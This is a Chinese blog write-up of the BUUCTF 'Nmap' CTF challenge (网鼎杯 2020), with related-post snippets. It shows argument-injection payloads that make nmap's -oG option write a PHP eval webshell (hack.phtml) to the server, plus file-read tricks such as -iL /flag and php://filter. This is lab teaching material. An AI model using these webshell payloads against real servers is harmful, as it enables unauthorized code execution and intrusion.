buuctf namp网鼎杯

最新推荐文章于 2024-07-27 13:59:36 发布
最新推荐文章于 2024-07-27 13:59:36 发布
阅读量211 收藏
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/125098765
版权

输入127.0.0.1,得到界面

根据题目namp得知是命令执行,输入127.0.0.1 | ls

输入127.0.0.1 | ls

可以看到|\转义,尝试使用;

看看分号能不能执行命令执行

我们发现分号也被转义了,那就很难使用命令执行了

尝试输入一句话木马:

127.0.0.1 | ' <?php @eval($_POST['zrtonnn']);?> -oG hack.php '

发现8行

后端应该是做了限制,尝试修改文件名后缀为phtml

127.0.0.1 | ' <?= eval($_POST[zrtonnn]);?> -oG hack.phtml '

得到扫描结果

 查看写入的文件,即访问hack.phtml

成功上传,一剑连接一下看看

得到flag

 flag{40f47690-9621-4e0e-85ba-2c1c43254c2e}

 

 

ANYOUZHEN
关注
网络安全的“奥运会”——第三届“网鼎杯”网络安全大赛即将开幕
ichunqiu2018的博客
06-22 1576
#网络安全“奥运会”来了! 乘风破浪潮头立,为国铸鼎正当时!由公安部指导,“政产学研用”各领域权威共襄盛举的第三届“网鼎杯”网络安全大赛如约而至,欢迎各行业各领域积极报名参与,报名链接https://www.wangdingcup.com...
namp网络连接端扫描软件
06-20
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络...
网鼎杯-nmap
szgyunyun的博客
05-25 483
Web 0x01 nmap 查看源码提示: 研究了半天分隔符绕过,后来放弃了,根据题目提示(127.0.01,不用扫外网),尝试扫描/flag并尝试将其输出到1.txt中 -iL /flag -oN 1.txt 尝试失败之后继续尝试闭合一下 127.0.0.1' -iL /flag -oN szgyy.txt ' 传马 ' <?php @eval($_POST["mazi"]);?> -oG mazi.php ' ' <?= @eval($_POST["password"]);?&gt
[网鼎杯 2020 朱雀组]Nmap(详细解读版)
最新发布
weixin_73399382的博客
07-27 1020
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
网鼎杯朱雀组-web(phpweb,Namp)
weixin_43610673的博客
05-19 368
phpweb func应该是传值函数名,后面p是参数 简单fuzz下,看看能用的函数,被ban的函数会回显Hacker… func=file_get_contents&p=php://filter/read=convert.base64-encode/resource=index.php Base64解码之后,看中间那段php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","s
buuctf-Nmap
m0_62094846的博客
04-07 2765
输入127.0.0.1出现界面,再根据题目的nmap知道是命令执行 输入127.0.0.1 | ls |被转义了,查一下可以用什么代替 分号也被转义了 %0a没被转义,但是也没用(我之前也觉得没有用,就是尝试一下) 那就很难用命令执行了 看看能不能输入一句话木马 127.0.0.1 | ' <?php @eval($_POST['value']);?> -oG hack.php ' 筛查后发现是php被过滤了,修改一下 127.0.0....
web buuctf [网鼎杯 2020 朱雀组]Nmap1
weixin_44214568的博客
04-05 1760
考点:namp注入 参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客 1. 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 我们直接用那道buu里的payload: ' <?php eval($_POST["cmd"]);?> -oG zhuque.php ' 注入之后发现存在过滤,fuzz,过滤了php (1)利用<?=来代替.
namp-win64
03-15
Nmap是一款针对大型网络的端口扫描工具,它也适用于单机扫描,它支持很多扫描,也同时支持性能和可靠性统计。
namp常用指令.txt
05-21
namp常用指令.txt
namp大集合[linux64版和windows64和32版]
10-11
Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具...
网鼎杯密码题
05-01
网鼎杯密码题chaoyang.txt,加密方式暂不说,想知道解题流程可以讨论
2020网鼎杯.zip
07-20
2020网鼎杯 逆向 pwn 密码 隐写赛题,除web外均有
PWN 网鼎杯 GUESS
SsMing的博客
09-11 1794
拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦! GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题 ida打开,查看一下源代码: 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的...
网鼎杯-phpweb
szgyunyun的博客
05-25 341
找了一些php读取文件的函数尝试读取源码,试了一个readfile就成功了 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_
网鼎杯 babyheap
MozhuCY的博客
09-21 900
网鼎杯第一场 程序功能:新建,编辑,打印,free free处没有置空指针,导致可以uaf malloc每次都是0x20的fastbin,编辑功能可以使用3次 自写了readn函数,没有溢出点 edit可以修改free后堆块的bk,fd 1 2 3 4 5 Arch: amd64-64-little RELRO: Full RELRO S...
BUUCTF: [网鼎杯 2020 朱雀组]Nmap
末初的CSDN博客
09-21 2011
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
网鼎杯初赛--web1
unexpectedthing的博客
08-29 661
2022网鼎杯初赛web
BUUCTF [网鼎杯 2020 朱雀组] Nmap
Senimo
12-09 3773
BUUCTF [网鼎杯 2020 朱雀组] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
Nmap网络扫描工具全面指南
"Nmap是一款强大的网络扫描工具,用于探测网络上的主机和开放的端口,以及识别操作系统类型。它在网络安全、系统管理、渗透测试等领域有着广泛应用。" Nmap是网络安全界的必备工具,其功能包括但不限于: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值